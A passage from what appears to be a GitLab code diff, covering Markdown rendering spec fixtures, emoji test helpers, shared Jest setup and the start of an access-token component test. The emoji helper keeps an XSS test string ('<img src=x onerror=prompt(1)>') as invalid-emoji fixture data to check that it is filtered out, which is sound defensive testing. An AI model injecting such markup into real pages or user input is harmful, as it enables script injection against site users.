class="p">)</span></span></code></pre> + <copy-code></copy-code> + </div> + +- name: color_chips + markdown: |- + - `#F00` + - `#F00A` + - `#FF0000` + - `#FF0000AA` + - `RGB(0,255,0)` + - `RGB(0%,100%,0%)` + - `RGBA(0,255,0,0.3)` + - `HSL(540,70%,50%)` + - `HSLA(540,70%,50%,0.3)` + html: |- + <ul data-sourcepos="1:1-9:25" dir="auto"> + <li data-sourcepos="1:1-1:8"><code>#F00<span class="gfm-color_chip"><span style="background-color: #F00;"></span></span></code></li> + <li data-sourcepos="2:1-2:9"><code>#F00A<span class="gfm-color_chip"><span style="background-color: #F00A;"></span></span></code></li> + <li data-sourcepos="3:1-3:11"><code>#FF0000<span class="gfm-color_chip"><span style="background-color: #FF0000;"></span></span></code></li> + <li data-sourcepos="4:1-4:13"><code>#FF0000AA<span class="gfm-color_chip"><span style="background-color: #FF0000AA;"></span></span></code></li> + <li data-sourcepos="5:1-5:16"><code>RGB(0,255,0)<span class="gfm-color_chip"><span style="background-color: RGB(0,255,0);"></span></span></code></li> + <li data-sourcepos="6:1-6:19"><code>RGB(0%,100%,0%)<span class="gfm-color_chip"><span style="background-color: RGB(0%,100%,0%);"></span></span></code></li> + <li data-sourcepos="7:1-7:21"><code>RGBA(0,255,0,0.3)<span class="gfm-color_chip"><span style="background-color: RGBA(0,255,0,0.3);"></span></span></code></li> + <li data-sourcepos="8:1-8:20"><code>HSL(540,70%,50%)<span class="gfm-color_chip"><span style="background-color: HSL(540,70%,50%);"></span></span></code></li> + <li data-sourcepos="9:1-9:25"><code>HSLA(540,70%,50%,0.3)<span class="gfm-color_chip"><span style="background-color: HSLA(540,70%,50%,0.3);"></span></span></code></li> + </ul> + +- name: description_list + markdown: |- + <dl> + <dt>Frog</dt> + <dd>Wet green thing</dd> + <dt>Rabbit</dt> + <dd>Warm fluffy thing</dd> + <dt>Punt</dt> + <dd>Kick a ball</dd> + <dd>Take a bet</dd> + <dt>Color</dt> + <dt>Colour</dt> + <dd> + + Any hue except _white_ or **black** + + </dd> + </dl> + html: |- + <dl> + <dt>Frog</dt> + <dd>Wet green thing</dd> + <dt>Rabbit</dt> + <dd>Warm fluffy thing</dd> + <dt>Punt</dt> + <dd>Kick a ball</dd> + <dd>Take a bet</dd> + <dt>Color</dt> + <dt>Colour</dt> + <dd> + <p data-sourcepos="13:1-13:35">Any hue except <em>white</em> or <strong>black</strong></p> + </dd> + </dl> + +- name: details + markdown: |- + <details> + <summary>This is the visible summary of the collapsible section</summary> + + 1. collapsed markdown + 2. more collapsed markdown + + </details> + html: |- + <details> + <summary>This is the visible summary of the collapsible section</summary> + <ol data-sourcepos="4:1-6:0"> + <li data-sourcepos="4:1-4:21">collapsed markdown</li> + <li data-sourcepos="5:1-6:0">more collapsed markdown</li> + </ol> + </details> + +- name: div + markdown: |- + <div>plain text</div> + <div> + + just a plain ol' div, not much to _expect_! + + </div> + html: |- + <div>plain text</div> + <div> + <p data-sourcepos="4:1-4:43">just a plain ol' div, not much to <em>expect</em>!</p> + </div> + +- name: emoji + markdown: |- + :sparkles: :heart: :100: + html: |- + <p data-sourcepos="1:1-1:24" dir="auto"><gl-emoji title="sparkles" data-name="sparkles" data-unicode-version="6.0">✨</gl-emoji> <gl-emoji title="heavy black heart" data-name="heart" data-unicode-version="1.1">❤</gl-emoji> <gl-emoji title="hundred points symbol" data-name="100" data-unicode-version="6.0">💯</gl-emoji></p> + +- name: emphasis + markdown: _emphasized text_ + html: <p data-sourcepos="1:1-1:17" dir="auto"><em>emphasized text</em></p> + +- name: figure + markdown: |- + <figure> + + ![Elephant at sunset](elephant-sunset.jpg) + + <figcaption>An elephant at sunset</figcaption> + </figure> + <figure> + + ![A crocodile wearing crocs](croc-crocs.jpg) + + <figcaption> + + A crocodile wearing _crocs_! + + </figcaption> + </figure> + html: |- + <figure> + <p data-sourcepos="3:1-3:42"><a class="no-attachment-icon" href="elephant-sunset.jpg" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="Elephant at sunset" class="lazy" data-src="elephant-sunset.jpg"></a></p> + <figcaption>An elephant at sunset</figcaption> + </figure> + <figure> + <p data-sourcepos="9:1-9:44"><a class="no-attachment-icon" href="croc-crocs.jpg" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="A crocodile wearing crocs" class="lazy" data-src="croc-crocs.jpg"></a></p> + <figcaption> + <p data-sourcepos="13:1-13:28">A crocodile wearing <em>crocs</em>!</p> + </figcaption> + </figure> + +- name: footnotes + substitutions: + # NOTE: We don't care about verifying specific attribute values here, that should be the + # responsibility of unit tests. These tests are about the structure of the HTML. + fn_href_substitution: + - regex: '(href)(=")(.+?)(")' + replacement: '\1\2REF\4' + footnote_id_substitution: + - regex: '(id)(=")(.+?)(")' + replacement: '\1\2ID\4' + + pending: + backend: https://gitlab.com/gitlab-org/gitlab/-/issues/346591 + markdown: |- + A footnote reference tag looks like this: [^1] + + This reference tag is a mix of letters and numbers. [^2] + + [^1]: This is the text inside a footnote. + [^2]: This is another footnote. + html: |- + <p data-sourcepos="1:1-1:46" dir="auto">A footnote reference tag looks like this: <sup class="footnote-ref"><a href="#fn-1-2717" id="fnref-1-2717" data-footnote-ref="">1</a></sup></p> + <p data-sourcepos="3:1-3:56" dir="auto">This reference tag is a mix of letters and numbers. <sup class="footnote-ref"><a href="#fn-2-2717" id="fnref-2-2717" data-footnote-ref="">2</a></sup></p> + <section class="footnotes" data-footnotes><ol> + <li id="fn-1-2717"> + <p data-sourcepos="5:7-5:41">This is the text inside a footnote. <a href="#fnref-1-2717" aria-label="Back to content" class="footnote-backref" data-footnote-backref=""><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> + </li> + <li id="fn-2-2717"> + <p data-sourcepos="6:7-6:31">This is another footnote. <a href="#fnref-2-2717" aria-label="Back to content" class="footnote-backref" data-footnote-backref=""><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> + </li> + </ol></section> + +- name: frontmatter_json + markdown: |- + ;;; + { + "title": "Page title" + } + ;;; + html: |- + <div class="gl-relative markdown-code-block js-markdown-code"> + <pre data-sourcepos="1:1-5:3" class="code highlight js-syntax-highlight language-json" lang="json" data-lang-params="frontmatter" v-pre="true"><code><span id="LC1" class="line" lang="json"><span class="p">{</span></span> + <span id="LC2" class="line" lang="json"><span class="w"> </span><span class="nl">"title"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Page title"</span></span> + <span id="LC3" class="line" lang="json"><span class="p">}</span></span></code></pre> + <copy-code></copy-code> + </div> + +- name: frontmatter_toml + markdown: |- + +++ + title = "Page title" + +++ + html: |- + <div class="gl-relative markdown-code-block js-markdown-code"> + <pre data-sourcepos="1:1-3:3" class="code highlight js-syntax-highlight language-toml" lang="toml" data-lang-params="frontmatter" v-pre="true"><code><span id="LC1" class="line" lang="toml"><span class="py">title</span> <span class="p">=</span> <span class="s">"Page title"</span></span></code></pre> + <copy-code></copy-code> + </div> + +- name: frontmatter_yaml + markdown: |- + --- + title: Page title + --- + html: |- + <div class="gl-relative markdown-code-block js-markdown-code"> + <pre data-sourcepos="1:1-3:3" class="code highlight js-syntax-highlight language-yaml" lang="yaml" data-lang-params="frontmatter" v-pre="true"><code><span id="LC1" class="line" lang="yaml"><span class="na">title</span><span class="pi">:</span> <span class="s">Page title</span></span></code></pre> + <copy-code></copy-code> + </div> + +- name: hard_break + markdown: |- + This is a line after a\ + hard break + html: |- + <p data-sourcepos="1:1-2:10" dir="auto">This is a line after a<br> + hard break</p> + +- name: headings + markdown: |- + # Heading 1 + + ## Heading 2 + + ### Heading 3 + + #### Heading 4 + + ##### Heading 5 + + ###### Heading 6 + html: |- + <h1 data-sourcepos="1:1-1:11" dir="auto"> + <a id="user-content-heading-1" class="anchor" href="#heading-1" aria-hidden="true"></a>Heading 1</h1> + <h2 data-sourcepos="3:1-3:12" dir="auto"> + <a id="user-content-heading-2" class="anchor" href="#heading-2" aria-hidden="true"></a>Heading 2</h2> + <h3 data-sourcepos="5:1-5:13" dir="auto"> + <a id="user-content-heading-3" class="anchor" href="#heading-3" aria-hidden="true"></a>Heading 3</h3> + <h4 data-sourcepos="7:1-7:14" dir="auto"> + <a id="user-content-heading-4" class="anchor" href="#heading-4" aria-hidden="true"></a>Heading 4</h4> + <h5 data-sourcepos="9:1-9:15" dir="auto"> + <a id="user-content-heading-5" class="anchor" href="#heading-5" aria-hidden="true"></a>Heading 5</h5> + <h6 data-sourcepos="11:1-11:16" dir="auto"> + <a id="user-content-heading-6" class="anchor" href="#heading-6" aria-hidden="true"></a>Heading 6</h6> + +- name: horizontal_rule + markdown: |- + --- + html: |- + <hr data-sourcepos="1:1-1:3"> + +- name: html_marks + markdown: |- + * Content editor is ~~great~~<ins>amazing</ins>. + * If the changes <abbr title="Looks good to merge">LGTM</abbr>, please <abbr title="Merge when pipeline succeeds">MWPS</abbr>. + * The English song <q>Oh I do like to be beside the seaside</q> looks like this in Hebrew: <span dir="rtl">אה, אני אוהב להיות ליד חוף הים</span>. In the computer's memory, this is stored as <bdo dir="ltr">אה, אני אוהב להיות ליד חוף הים</bdo>. + * <cite>The Scream</cite> by Edvard Munch. Painted in 1893. + * <dfn>HTML</dfn> is the standard markup language for creating web pages. + * Do not forget to buy <mark>milk</mark> today. + * This is a paragraph and <small>smaller text goes here</small>. + * The concert starts at <time datetime="20:00">20:00</time> and you'll be able to enjoy the band for at least <time datetime="PT2H30M">2h 30m</time>. + * Press <kbd>Ctrl</kbd> + <kbd>C</kbd> to copy text (Windows). + * WWF's goal is to: <q>Build a future where people live in harmony with nature.</q> We hope they succeed. + * The error occured was: <samp>Keyboard not found. Press F1 to continue.</samp> + * The area of a triangle is: 1/2 x <var>b</var> x <var>h</var>, where <var>b</var> is the base, and <var>h</var> is the vertical height. + * <ruby>漢<rt>ㄏㄢˋ</rt></ruby> + * C<sub>7</sub>H<sub>16</sub> + O<sub>2</sub> → CO<sub>2</sub> + H<sub>2</sub>O + * The **Pythagorean theorem** is often expressed as <var>a<sup>2</sup></var> + <var>b<sup>2</sup></var> = <var>c<sup>2</sup></var> + html: |- + <ul data-sourcepos="1:1-15:130" dir="auto"> + <li data-sourcepos="1:1-1:48">Content editor is <del>great</del><ins>amazing</ins>.</li> + <li data-sourcepos="2:1-2:126">If the changes <abbr title="Looks good to merge">LGTM</abbr>, please <abbr title="Merge when pipeline succeeds">MWPS</abbr>.</li> + <li data-sourcepos="3:1-3:288">The English song <q>Oh I do like to be beside the seaside</q> looks like this in Hebrew: <span dir="rtl">אה, אני אוהב להיות ליד חוף הים</span>. In the computer's memory, this is stored as <bdo dir="ltr">אה, אני אוהב להיות ליד חוף הים</bdo>.</li> + <li data-sourcepos="4:1-4:59"> + <cite>The Scream</cite> by Edvard Munch. Painted in 1893.</li> + <li data-sourcepos="5:1-5:73"> + <dfn>HTML</dfn> is the standard markup language for creating web pages.</li> + <li data-sourcepos="6:1-6:47">Do not forget to buy <mark>milk</mark> today.</li> + <li data-sourcepos="7:1-7:64">This is a paragraph and <small>smaller text goes here</small>.</li> + <li data-sourcepos="8:1-8:149">The concert starts at <time datetime="20:00">20:00</time> and you'll be able to enjoy the band for at least <time datetime="PT2H30M">2h 30m</time>.</li> + <li data-sourcepos="9:1-9:62">Press <kbd>Ctrl</kbd> + <kbd>C</kbd> to copy text (Windows).</li> + <li data-sourcepos="10:1-10:105">WWF's goal is to: <q>Build a future where people live in harmony with nature.</q> We hope they succeed.</li> + <li data-sourcepos="11:1-11:79">The error occured was: <samp>Keyboard not found. Press F1 to continue.</samp> + </li> + <li data-sourcepos="12:1-12:136">The area of a triangle is: 1/2 x <var>b</var> x <var>h</var>, where <var>b</var> is the base, and <var>h</var> is the vertical height.</li> + <li data-sourcepos="13:1-13:35"><ruby>漢<rt>ㄏㄢˋ</rt></ruby></li> + <li data-sourcepos="14:1-14:81">C<sub>7</sub>H<sub>16</sub> + O<sub>2</sub> → CO<sub>2</sub> + H<sub>2</sub>O</li> + <li data-sourcepos="15:1-15:130">The <strong>Pythagorean theorem</strong> is often expressed as <var>a<sup>2</sup></var> + <var>b<sup>2</sup></var> = <var>c<sup>2</sup></var> + </li> + </ul> + +- name: image + markdown: |- + ![alt text](https://gitlab.com/logo.png) + html: |- + <p data-sourcepos="1:1-1:40" dir="auto"><a class="no-attachment-icon" href="https://gitlab.com/logo.png" target="_blank" rel="nofollow noreferrer noopener"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="alt text" class="lazy" data-src="https://gitlab.com/logo.png"></a></p> + +- name: inline_code + markdown: |- + `code` + html: |- + <p data-sourcepos="1:1-1:6" dir="auto"><code>code</code></p> + +- name: inline_diff + markdown: |- + * {-deleted-} + * {+added+} + html: |- + <ul data-sourcepos="1:1-2:11" dir="auto"> + <li data-sourcepos="1:1-1:13"><span class="idiff left right deletion">deleted</span></li> + <li data-sourcepos="2:1-2:11"><span class="idiff left right addition">added</span></li> + </ul> + +- name: label + pending: + # TODO: There is an error with the frontend HTML to markdown spec adding a double escape (\\) to the label tilde. + frontend: 'There is an error with the frontend HTML to markdown spec adding a double escape (\\) to the label tilde.' + markdown: |- + ~bug + html: |- + <p data-sourcepos="1:1-1:4" dir="auto">~bug</p> + +- name: link + markdown: |- + [GitLab](https://gitlab.com) + html: |- + <p data-sourcepos="1:1-1:28" dir="auto"><a href="https://gitlab.com" rel="nofollow noreferrer noopener" target="_blank">GitLab</a></p> + +- name: math + markdown: |- + This math is inline $`a^2+b^2=c^2`$. + + This is on a separate line: + + ```math + a^2+b^2=c^2 + ``` + html: |- + <p data-sourcepos="1:1-1:36" dir="auto">This math is inline <code class="code math js-render-math" data-math-style="inline">a^2+b^2=c^2</code>.</p> + <p data-sourcepos="3:1-3:27" dir="auto">This is on a separate line:</p> + <div class="gl-relative markdown-code-block js-markdown-code"> + <pre data-sourcepos="5:1-7:3" class="code highlight js-syntax-highlight language-math js-render-math" lang="math" v-pre="true" data-math-style="display"><code><span id="LC1" class="line" lang="math">a^2+b^2=c^2</span></code></pre> + <copy-code></copy-code> + </div> + +- name: ordered_list + markdown: |- + 1. list item 1 + 2. list item 2 + 3. list item 3 + html: |- + <ol data-sourcepos="1:1-3:14" dir="auto"> + <li data-sourcepos="1:1-1:14">list item 1</li> + <li data-sourcepos="2:1-2:14">list item 2</li> + <li data-sourcepos="3:1-3:14">list item 3</li> + </ol> + +- name: ordered_list_with_start_order + markdown: |- + 134. list item 1 + 135. list item 2 + 136. list item 3 + html: |- + <ol start="134" data-sourcepos="1:1-3:16" dir="auto"> + <li data-sourcepos="1:1-1:16">list item 1</li> + <li data-sourcepos="2:1-2:16">list item 2</li> + <li data-sourcepos="3:1-3:16">list item 3</li> + </ol> + +- name: ordered_task_list + markdown: |- + 1. [x] hello + 2. [x] world + 3. [ ] example + 1. [ ] of nested + 1. [x] task list + 2. [ ] items + html: |- + <ol data-sourcepos="1:1-6:18" class="task-list" dir="auto"> + <li data-sourcepos="1:1-1:12" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> hello</li> + <li data-sourcepos="2:1-2:12" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> world</li> + <li data-sourcepos="3:1-6:18" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> example + <ol data-sourcepos="4:4-6:18" class="task-list"> + <li data-sourcepos="4:4-6:18" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> of nested + <ol data-sourcepos="5:7-6:18" class="task-list"> + <li data-sourcepos="5:7-5:22" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> task list</li> + <li data-sourcepos="6:7-6:18" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> items</li> + </ol> + </li> + </ol> + </li> + </ol> + +- name: ordered_task_list_with_order + markdown: |- + 4893. [x] hello + 4894. [x] world + 4895. [ ] example + html: |- + <ol start="4893" data-sourcepos="1:1-3:17" class="task-list" dir="auto"> + <li data-sourcepos="1:1-1:15" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> hello</li> + <li data-sourcepos="2:1-2:15" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> world</li> + <li data-sourcepos="3:1-3:17" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> example</li> + </ol> + +- name: reference_for_project_wiki + api_context: project_wiki + substitutions: + # NOTE: We don't care about verifying specific attribute values here, that should be the + # responsibility of unit tests. These tests are about the structure of the HTML. + uri_substitution: *uri_substitution + data_attribute_id_substitution: + - regex: '(data-user|data-project|data-issue|data-iid|data-merge-request|data-milestone)(=")(\d+?)(")' + replacement: '\1\2ID\4' + text_attribute_substitution: + - regex: '(title)(=")(.+?)(")' + replacement: '\1\2TEXT\4' + path_attribute_id_substitution: + - regex: '(group|project)(\d+)' + replacement: '\1ID' + markdown: |- + Hi @gfm_user - thank you for reporting this bug (#1) we hope to fix it in %1.1 as part of !1 + html: |- + <p data-sourcepos="1:1-1:92" dir="auto">Hi <a href="/gfm_user" data-user="1" data-reference-type="user" data-container="body" data-placement="top" class="gfm gfm-project_member js-user-link" title="John Doe1">@gfm_user</a> - thank you for reporting this bug (<a href="/group1/project1/-/issues/1" data-original="#1" data-link="false" data-link-reference="false" data-project="11" data-issue="11" data-reference-type="issue" data-container="body" data-placement="top" title="My title 1" class="gfm gfm-issue has-tooltip">#1</a>) we hope to fix it in <a href="/group1/project1/-/milestones/1" data-original="%1.1" data-link="false" data-link-reference="false" data-project="11" data-milestone="11" data-reference-type="milestone" data-container="body" data-placement="top" title="" class="gfm gfm-milestone has-tooltip">%1.1</a> as part of <a href="/group1/project1/-/merge_requests/1" data-original="!1" data-link="false" data-link-reference="false" data-project="11" data-merge-request="11" data-project-path="group1/project1" data-iid="1" data-mr-title="My title 2" data-reference-type="merge_request" data-container="body" data-placement="top" title="" class="gfm gfm-merge_request">!1</a></p> +- name: strike + markdown: |- + ~~del~~ + html: |- + <p data-sourcepos="1:1-1:7" dir="auto"><del>del</del></p> + +- name: table + markdown: |- + | header | header | + |--------|--------| + | `code` | cell with **bold** | + | ~~strike~~ | cell with _italic_ | + + # content after table + html: |- + <table data-sourcepos="1:1-4:35" dir="auto"> + <thead> + <tr data-sourcepos="1:1-1:19"> + <th data-sourcepos="1:2-1:9">header</th> + <th data-sourcepos="1:11-1:18">header</th> + </tr> + </thead> + <tbody> + <tr data-sourcepos="3:1-3:31"> + <td data-sourcepos="3:2-3:9"><code>code</code></td> + <td data-sourcepos="3:11-3:30">cell with <strong>bold</strong> + </td> + </tr> + <tr data-sourcepos="4:1-4:35"> + <td data-sourcepos="4:2-4:13"><del>strike</del></td> + <td data-sourcepos="4:15-4:34">cell with <em>italic</em> + </td> + </tr> + </tbody> + </table> + <h1 data-sourcepos="6:1-6:21" dir="auto"> + <a id="user-content-content-after-table" class="anchor" href="#content-after-table" aria-hidden="true"></a>content after table</h1> + +- name: table_of_contents + markdown: |- + [[_TOC_]] + + # Lorem + + Well, that's just like... your opinion.. man. + + ## Ipsum + + ### Dolar + + # Sit amit + + ### I don't know + html: |- + <ul class="section-nav"> + <li> + <a href="#lorem">Lorem</a><ul><li> + <a href="#ipsum">Ipsum</a><ul><li><a href="#dolar">Dolar</a></li></ul> + </li></ul> + </li> + <li> + <a href="#sit-amit">Sit amit</a><ul><li><a href="#i-dont-know">I don't know</a></li></ul> + </li> + </ul> + <h1 data-sourcepos="3:1-3:7" dir="auto"> + <a id="user-content-lorem" class="anchor" href="#lorem" aria-hidden="true"></a>Lorem</h1> + <p data-sourcepos="5:1-5:45" dir="auto">Well, that's just like... your opinion.. man.</p> + <h2 data-sourcepos="7:1-7:8" dir="auto"> + <a id="user-content-ipsum" class="anchor" href="#ipsum" aria-hidden="true"></a>Ipsum</h2> + <h3 data-sourcepos="9:1-9:9" dir="auto"> + <a id="user-content-dolar" class="anchor" href="#dolar" aria-hidden="true"></a>Dolar</h3> + <h1 data-sourcepos="11:1-11:10" dir="auto"> + <a id="user-content-sit-amit" class="anchor" href="#sit-amit" aria-hidden="true"></a>Sit amit</h1> + <h3 data-sourcepos="13:1-13:16" dir="auto"> + <a id="user-content-i-dont-know" class="anchor" href="#i-dont-know" aria-hidden="true"></a>I don't know</h3> + +- name: task_list + markdown: |- + * [x] hello + * [x] world + * [ ] example + * [ ] of nested + * [x] task list + * [ ] items + html: |- + <ul data-sourcepos="1:1-6:15" class="task-list" dir="auto"> + <li data-sourcepos="1:1-1:11" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> hello</li> + <li data-sourcepos="2:1-2:11" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> world</li> + <li data-sourcepos="3:1-6:15" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> example + <ul data-sourcepos="4:3-6:15" class="task-list"> + <li data-sourcepos="4:3-6:15" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> of nested + <ul data-sourcepos="5:5-6:15" class="task-list"> + <li data-sourcepos="5:5-5:19" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> task list</li> + <li data-sourcepos="6:5-6:15" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> items</li> + </ul> + </li> + </ul> + </li> + </ul> + +- name: video + markdown: |- + ![Sample Video](https://gitlab.com/gitlab.mp4) + html: |- + <p data-sourcepos="1:1-1:46" dir="auto"><span class="media-container video-container"><video src="https://gitlab.com/gitlab.mp4" controls="true" data-setup="{}" data-title="Sample Video" width="400" preload="metadata"></video><a href="https://gitlab.com/gitlab.mp4" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Video'">Sample Video</a></span></p> + +- name: word_break + markdown: Fernstraßen<wbr>bau<wbr>privat<wbr>finanzierungs<wbr>gesetz + html: <p data-sourcepos="1:1-1:60" dir="auto">Fernstraßen<wbr>bau<wbr>privat<wbr>finanzierungs<wbr>gesetz</wbr></wbr></wbr></wbr></p> diff --git a/spec/fixtures/packages/generic/myfile.zip b/spec/fixtures/packages/generic/myfile.zip Binary files differnew file mode 100644 index 00000000000..6048bd2f246 --- /dev/null +++ b/spec/fixtures/packages/generic/myfile.zip diff --git a/spec/frontend/__helpers__/emoji.js b/spec/frontend/__helpers__/emoji.js index a64135601ae..014a7854024 100644 --- a/spec/frontend/__helpers__/emoji.js +++ b/spec/frontend/__helpers__/emoji.js @@ -1,8 +1,7 @@ -import MockAdapter from 'axios-mock-adapter'; import { initEmojiMap, EMOJI_VERSION } from '~/emoji'; -import axios from '~/lib/utils/axios_utils'; +import { CACHE_VERSION_KEY, CACHE_KEY } from '~/emoji/constants'; -export const emojiFixtureMap = { +export const validEmoji = { atom: { moji: '⚛', description: 'atom symbol', @@ -49,11 +48,39 @@ export const emojiFixtureMap = { unicodeVersion: '5.1', description: 'white medium star', }, + gay_pride_flag: { + moji: '🏳️🌈', + unicodeVersion: '7.0', + description: 'because it contains a zero width joiner', + }, + family_mmb: { + moji: '👨👨👦', + unicodeVersion: '6.0', + description: 'because it contains multiple zero width joiners', + }, +}; + +export const invalidEmoji = { xss: { moji: '<img src=x onerror=prompt(1)>', unicodeVersion: '5.1', description: 'xss', }, + non_moji: { + moji: 'I am not an emoji...', + unicodeVersion: '9.0', + description: '...and should be filtered out', + }, + multiple_moji: { + moji: '🍂🏭', + unicodeVersion: '9.0', + description: 'Multiple separate emoji that are not joined by a zero width joiner', + }, +}; + +export const emojiFixtureMap = { + ...validEmoji, + ...invalidEmoji, }; export const mockEmojiData = Object.keys(emojiFixtureMap).reduce((acc, k) => { @@ -63,11 +90,14 @@ export const mockEmojiData = Object.keys(emojiFixtureMap).reduce((acc, k) => { return acc; }, {}); -export async function initEmojiMock(mockData = mockEmojiData) { - const mock = new MockAdapter(axios); - mock.onGet(`/-/emojis/${EMOJI_VERSION}/emojis.json`).reply(200, JSON.stringify(mockData)); +export function clearEmojiMock() { + localStorage.clear(); + initEmojiMap.promise = null; +} +export async function initEmojiMock(mockData = mockEmojiData) { + clearEmojiMock(); + localStorage.setItem(CACHE_VERSION_KEY, EMOJI_VERSION); + localStorage.setItem(CACHE_KEY, JSON.stringify(mockData)); await initEmojiMap(); - - return mock; } diff --git a/spec/frontend/__helpers__/experimentation_helper.js b/spec/frontend/__helpers__/experimentation_helper.js index e0156226acc..d5044be88d7 100644 --- a/spec/frontend/__helpers__/experimentation_helper.js +++ b/spec/frontend/__helpers__/experimentation_helper.js @@ -25,7 +25,7 @@ export function stubExperiments(experiments = {}) { window.gon.experiment = window.gon.experiment || {}; // Preferred window.gl = window.gl || {}; - window.gl.experiments = window.gl.experiemnts || {}; + window.gl.experiments = window.gl.experiments || {}; Object.entries(experiments).forEach(([name, variant]) => { const experimentData = { experiment: name, variant }; diff --git a/spec/frontend/matchers.js b/spec/frontend/__helpers__/matchers.js index 945abdafe9a..945abdafe9a 100644 --- a/spec/frontend/matchers.js +++ b/spec/frontend/__helpers__/matchers.js diff --git a/spec/frontend/matchers_spec.js b/spec/frontend/__helpers__/matchers_spec.js index dfd6f754c72..dfd6f754c72 100644 --- a/spec/frontend/matchers_spec.js +++ b/spec/frontend/__helpers__/matchers_spec.js diff --git a/spec/frontend/__helpers__/mock_apollo_helper.js b/spec/frontend/__helpers__/mock_apollo_helper.js index 520d6c72541..ee4bbd42b1e 100644 --- a/spec/frontend/__helpers__/mock_apollo_helper.js +++ b/spec/frontend/__helpers__/mock_apollo_helper.js @@ -26,7 +26,5 @@ export function createMockClient(handlers = [], resolvers = {}, cacheOptions = { export default function createMockApollo(handlers, resolvers, cacheOptions) { const mockClient = createMockClient(handlers, resolvers, cacheOptions); - const apolloProvider = new VueApollo({ defaultClient: mockClient }); - - return apolloProvider; + return new VueApollo({ defaultClient: mockClient }); } diff --git a/spec/frontend/mocks/ce/lib/utils/axios_utils.js b/spec/frontend/__helpers__/mocks/axios_utils.js index 674563b9f28..674563b9f28 100644 --- a/spec/frontend/mocks/ce/lib/utils/axios_utils.js +++ b/spec/frontend/__helpers__/mocks/axios_utils.js diff --git a/spec/frontend/__helpers__/shared_test_setup.js b/spec/frontend/__helpers__/shared_test_setup.js new file mode 100644 index 00000000000..03389e16b65 --- /dev/null +++ b/spec/frontend/__helpers__/shared_test_setup.js @@ -0,0 +1,90 @@ +/* Common setup for both unit and integration test environments */ +import { config as testUtilsConfig } from '@vue/test-utils'; +import * as jqueryMatchers from 'custom-jquery-matchers'; +import Vue from 'vue'; +import 'jquery'; +import Translate from '~/vue_shared/translate'; +import setWindowLocation from './set_window_location_helper'; +import { setGlobalDateToFakeDate } from './fake_date'; +import { loadHTMLFixture, setHTMLFixture } from './fixtures'; +import { TEST_HOST } from './test_constants'; +import customMatchers from './matchers'; + +import './dom_shims'; +import './jquery'; +import '~/commons/bootstrap'; + +// This module has some fairly decent visual test coverage in it's own repository. +jest.mock('@gitlab/favicon-overlay'); + +process.on('unhandledRejection', global.promiseRejectionHandler); + +// Fake the `Date` for the rest of the jest spec runtime environment. +// https://gitlab.com/gitlab-org/gitlab/-/merge_requests/39496#note_503084332 +setGlobalDateToFakeDate(); + +Vue.config.devtools = false; +Vue.config.productionTip = false; + +Vue.use(Translate); + +// convenience wrapper for migration from Karma +Object.assign(global, { + loadFixtures: loadHTMLFixture, + setFixtures: setHTMLFixture, +}); + +const JQUERY_MATCHERS_TO_EXCLUDE = ['toHaveLength', 'toExist']; + +// custom-jquery-matchers was written for an old Jest version, we need to make it compatible +Object.entries(jqueryMatchers).forEach(([matcherName, matcherFactory]) => { + // Exclude these jQuery matchers + if (JQUERY_MATCHERS_TO_EXCLUDE.includes(matcherName)) { + return; + } + + expect.extend({ + [matcherName]: matcherFactory().compare, + }); +}); + +expect.extend(customMatchers); + +testUtilsConfig.deprecationWarningHandler = (method, message) => { + const ALLOWED_DEPRECATED_METHODS = [ + // https://gitlab.com/gitlab-org/gitlab/-/issues/295679 + 'finding components with `find` or `get`', + + // https://gitlab.com/gitlab-org/gitlab/-/issues/295680 + 'finding components with `findAll`', + ]; + if (!ALLOWED_DEPRECATED_METHODS.includes(method)) { + global.console.error(message); + } +}; + +Object.assign(global, { + requestIdleCallback(cb) { + const start = Date.now(); + return setTimeout(() => { + cb({ + didTimeout: false, + timeRemaining: () => Math.max(0, 50 - (Date.now() - start)), + }); + }); + }, + cancelIdleCallback(id) { + clearTimeout(id); + }, +}); + +beforeEach(() => { + // make sure that each test actually tests something + // see https://jestjs.io/docs/en/expect#expecthasassertions + expect.hasAssertions(); + + // Reset the mocked window.location. This ensures tests don't interfere with + // each other, and removes the need to tidy up if it was changed for a given + // test. + setWindowLocation(TEST_HOST); +}); diff --git a/spec/frontend/access_tokens/components/token_spec.js b/spec/frontend/access_tokens/components/token_spec.js new file mode 100644 index 00000000000..1af21aaa8cd --- /dev/null +++ b/spec/frontend/access_tokens/components/token_spec.js @@ -0,0 +1,65 @@ +import { mountExtended } from 'helpers/vue_test_utils_helper'; + +import Token from '~/access_tokens/components/token.vue'; +import InputCopyToggleVisibility from '~/vue_shared/components/form/input_copy_toggle_visibility.vue'; + +describe('Token', () => { + let wrapper; + + const defaultPropsData = { + token: 'az4a2l5f8ssa0zvdfbhidbzlx', + inputId: 'feed_token', + inputLabel: 'Feed token', + copyButtonTitle: 'Copy feed token', + 